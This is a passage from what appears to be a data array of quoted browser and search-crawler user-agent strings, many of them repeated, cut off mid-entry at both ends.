(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) 